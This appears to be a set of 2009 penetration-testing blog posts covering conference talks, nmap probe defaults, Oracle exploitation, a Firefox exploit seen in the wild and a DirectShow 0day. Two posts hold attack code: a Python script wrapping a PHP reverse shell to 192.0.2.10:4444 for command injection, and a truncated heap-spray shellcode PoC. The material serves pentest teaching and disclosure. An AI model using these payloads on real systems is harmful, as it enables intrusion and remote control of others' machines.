Las Vegas 2009

There are so many things going on in Vegas this year it's hard to keep track of them all.

1.) HD Moore and I are teaching a class on Tactical Exploitation at Blackhat July 27-28th

2.) The first day of Blackhat Briefings, July 29th we have organized an entire Metasploit Track.

Many Metasploit, Attack Research, carnal0wnage and other people will be speaking in this special track, including:

Dino Dai Zovi, Mike Kershaw, Chris Gates, Peter Silberman, Egypt, I)ruid, Valsmith, Colin Ames, and Dave Kerb.

3.) On Thursday July 30th, HD Moore, Valsmith and others will be speaking at an undisclosed location for BsidesLasVegas

4.) Friday night Attack Research has rented the top of the Riviera for a small party. Find someone from AR to get a specially minted party invite challenge coin

5.) Saturday at Defcon we have another special Metasploit track that runs all day, same speakers as Blackhat but also including HD Moore and others.

6.) Saturday at noon Valsmith will also be giving a skytalk

There is much, much more great stuff going on, so hope to see you there!

V.

New Nmap Ping Sweep Defaults

As a note to self (and anyone who reads the blog):

http://nmap.org/5/#changes

"The host discovery (ping probe) defaults have been enhanced to include twice as many probes. The default is now "-PE -PS443 -PA80 -PP". In exhaustive testing of 90 different probes, this emerged as the best four-probe combination, finding 14% more Internet hosts than the previous default, "-PE -PA80". The default for non-root users is -PS80,443, replacing the previous default of -PS80. In addition, ping probes are now sent in order of effectiveness (-PE first) so that less effective probes may not have to be sent. ARP ping is still the default on local ethernet networks."

Oracle Secure Backup Command Injection to Metasploit PHP Shell

Background and motivation here:
http://joxeankoret.com/blog/?p=39

Before I forget thanks to egypt, pragmatk, and of course MC...

MSF trunk has had a module for a while that exploits the above:
http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/ad...

Given the example in Joxean's advisory with the PHP shell, I hit up the Metasploit PHP ninja (egypt) on how to leverage it.

Metasploit has PHP reverse and bind shell payloads; you can use the multi/handler to catch callbacks or connect to the bind shell. To get the shell onto the box we can output the payload as raw or base64.
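As an added example (not code from the original post, Metasploit, or Joxean's advisory), the two delivery forms mentioned above side by side. The PHP body is a constructed stand-in for a Metasploit php/reverse_php payload, and the host 192.0.2.10, port 4444 and the `echo ... | base64 -d | php` pipe are assumptions about the target; the point it shows is why the base64 form is the one you normally want in a command-injection context: the raw form has to carry every quote and metacharacter of the PHP through the injection point, while the base64 form is pure [A-Za-z0-9+/=].

```python
import base64
import re
import shlex

# Constructed stand-in for the PHP payload body.  In practice this would be the
# output of msfpayload/msfvenom for php/reverse_php; LHOST/LPORT are assumptions.
PHP_REVERSE = (
    "$s=fsockopen('192.0.2.10',4444);"
    "while(!feof($s)){$c=fgets($s);$o=shell_exec($c);fwrite($s,$o);}"
)


def wrap_raw(php_code: str) -> str:
    """Deliver the payload verbatim via `php -r`.

    Every single quote inside the PHP has to be re-escaped for the shell, and
    the whole thing only works if the injection point passes quotes, $, ( ) and
    ; through untouched.
    """
    return "php -r " + shlex.quote(php_code)


def wrap_base64(php_code: str) -> str:
    """Deliver the payload as a base64 blob decoded on the target.

    `php` reading a script from stdin expects a full PHP file, so the open tag
    is prepended before encoding.  The resulting command line contains no
    quotes, no $ and no parentheses, which survives most filters and quoting
    contexts that would mangle the raw form.
    """
    blob = base64.b64encode(("<?php " + php_code).encode()).decode()
    return f"echo {blob}|base64 -d|php"


def has_quotes(cmd: str) -> bool:
    """True if the command line carries any shell quote character."""
    return any(ch in cmd for ch in "'\"`")


def unwrap_base64(cmd: str) -> str:
    """Recover the PHP from a wrap_base64() command line (sanity check)."""
    m = re.fullmatch(r"echo ([A-Za-z0-9+/=]+)\|base64 -d\|php", cmd)
    if not m:
        raise ValueError("not a base64-wrapped command line")
    return base64.b64decode(m.group(1)).decode()


if __name__ == "__main__":
    print("raw:   ", wrap_raw(PHP_REVERSE))
    print("base64:", wrap_base64(PHP_REVERSE))
```

Once the payload lands, the catching side is the usual `exploit/multi/handler` with `PAYLOAD php/reverse_php` and the same LHOST/LPORT.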

Firefox 3.5 (Font tags) Remote Buffer Overflow actively being exploited.

After doing my usual digging through my list of malicious URLs for the morning, I came across a site that is actively exploiting the new Firefox vuln using the exploit written by Simon Berry-Byrne. It uses a standard heap spray technique for code exec. The site hosting this exploit appears to be a legitimate site that was compromised. It looks like an RFI may have been used to drop the file on the site. The page located at /img/icons/f.htm is a direct copy of the milw0rm code. They did not even bother to remove any of the comments. A simple download-and-execute payload is used.

Microsoft DirectShow MPEG2TuneRequest Stack Overflow P0C

So this 0day popped up in some malware today and has been floating around the Chinese forums (darkst.com) for a while, it seems. It has been reported on by all the infosec sites/blogs at this point.

For those that are interested, here's a P0C (the shellcode string is cut off here).

//calc.exe thanks to msf.
var sCode=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
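As an added example, not from the original post: the first thing to do with a `%u`-escaped shellcode string like the one above is to turn it back into the bytes it occupies in memory, so you can see what was sprayed. `unescape("%u03eb")` yields the UTF-16 code unit 0x03EB, which the heap spray stores little-endian, so it becomes the bytes EB 03. The fragment embedded below is copied from the first two lines of the PoC above (the page truncates the rest); the interpretation of the leading bytes as a jmp/pop/call GetPC stub is my reading of the decoded bytes, not something the post states.

```python
import re

# Copied from the PoC above; the full string is truncated on the page.
SCODE_FRAGMENT = (
    "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"
    "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"
)

# jmp +3 / pop ecx / jmp +5 / call -8: a classic GetPC stub, here the first
# ten bytes of the decoded fragment.
GETPC_STUB = b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff"

# One token per %uXXXX, %XX, or plain character (JS unescape() semantics:
# anything that is not a valid escape is kept literally).
_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.S)


def unescape_to_bytes(s: str) -> bytes:
    """Decode a JavaScript unescape() string into the in-memory byte layout.

    %uXXXX -> two bytes, low byte first (UTF-16LE code unit)
    %XX    -> one byte
    other  -> one byte (low 8 bits of the character)
    """
    out = bytearray()
    for u16, u8, ch in _TOKEN.findall(s):
        if u16:
            v = int(u16, 16)
            out += bytes((v & 0xFF, v >> 8))
        elif u8:
            out.append(int(u8, 16))
        else:
            out.append(ord(ch) & 0xFF)
    return bytes(out)


def starts_with_getpc(code: bytes) -> bool:
    """True if the shellcode opens with the jmp/pop/call GetPC stub."""
    return code.startswith(GETPC_STUB)


def hexdump(code: bytes, width: int = 16) -> str:
    """Simple hex + ASCII dump for eyeballing decoded shellcode."""
    lines = []
    for off in range(0, len(code), width):
        chunk = code[off:off + width]
        hx = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:04x}  {hx:<{width * 3}} {asc}")
    return "\n".join(lines)


if __name__ == "__main__":
    sc = unescape_to_bytes(SCODE_FRAGMENT)
    print(hexdump(sc))
    print("GetPC stub:", starts_with_getpc(sc))
```

After the stub the decoded bytes are the printable run `IIII...` (0x49, `dec ecx`) that alphanumeric encoders pad with, which is what you expect from an msf-generated calc.exe payload.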

Oracle TNS listener support for nmap

So I upgraded to the latest version of nmap and it will now give you TNS listener versions. I couldn't find the exact build where this started, but it's certainly handy.

C:\Users\CG\AppData\Local\msf32>nmap -sV 192.168.73.132

Starting Nmap 4.76 ( http://nmap.org ) at 2009-06-27 10:33 Eastern Daylight Time

Interesting ports on 192.168.73.132:
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1047/tcp open unknown?
1521/tcp open oracle-tns Oracle TNS Listener

Full Day Metasploit Track at Blackhat!

I managed to pull off (with huge work from Ping) organizing a whole track at Blackhat dedicated to Metasploit:

http://www.blackhat.com/html/bh-usa-09/bh-usa-09-schedule.html

Here are the speakers:
dino dai zovi - Macsploitation with Metasploit
mike kershaw - Kismet & MSF
Chris Gates - Breaking the Unbreakable Oracle with Metasploit
peter silberman & Steve Davis - Metasploit Autopsy: Reconstructing the Crime Scene
Egypt - Using Guided Missiles in Drive-Bys
Dustin Trammell - MSF Telephony
Valsmith, Colin Ames & David Kerb - Metaphish

As usual I am up against Kaminsky's talk.

See you there!

V.

Oracle ExtProc Backdoors

So this will be half Defcon Teaser and half "happy I got it to work" post.

So back in 2006 Marco Ivaldi released some code for the Oracle ExtProc directory traversal vulnerability.

links:
http://www.securiteam.com/exploits/6G00L00HPM.html
http://xforce.iss.net/xforce/xfdb/18658
http://www.0xdeadbeef.info/

It essentially allows you to call libraries outside of the %ORACLE_HOME% path. This was later patched to only allow libraries/DLLs in %ORACLE_HOME%\bin unless changed in one of your .ora files, which really isn't feasible for a remote attacker.

So, I've been able to port the directory traversal exploit code for some of our post-exploitation tasks for use with the Oracle mixin. See the 2nd link for vulnerable systems; it reportedly works on almost all Oracle 9 systems.

Coming soon to a pentest near you...

So I've been using a series of scripts and custom emails and webpages to do phishing/client-side attacks during pentests for a good few years now. A while back Pragmatk and I, while working on better plugin detection and a few other things for the scripts, decided we needed a GUI, better management, tracking, reports, metrics and trending, better templates, JS obfuscation, database functionality, scheduling and a few other things. So basically we wanted a tool that did everything we could think of during a phish.

I've been really slow about building the web frontend, but we're finally getting it to a functional beta and should have something ready for release in the next month and a half, barring any unforeseen events.

PDF Defiling Intro

PDF, n.
\p-di-ef\

I. Portable Document Format (PDF) is a file format created by Adobe Systems in 1993 for document exchange.

Defiling, tv.
Defile, v.
\di-ˈfī(-ə)l, dē-\

I. a. to make unclean or impure; b. to corrupt the purity or perfection of.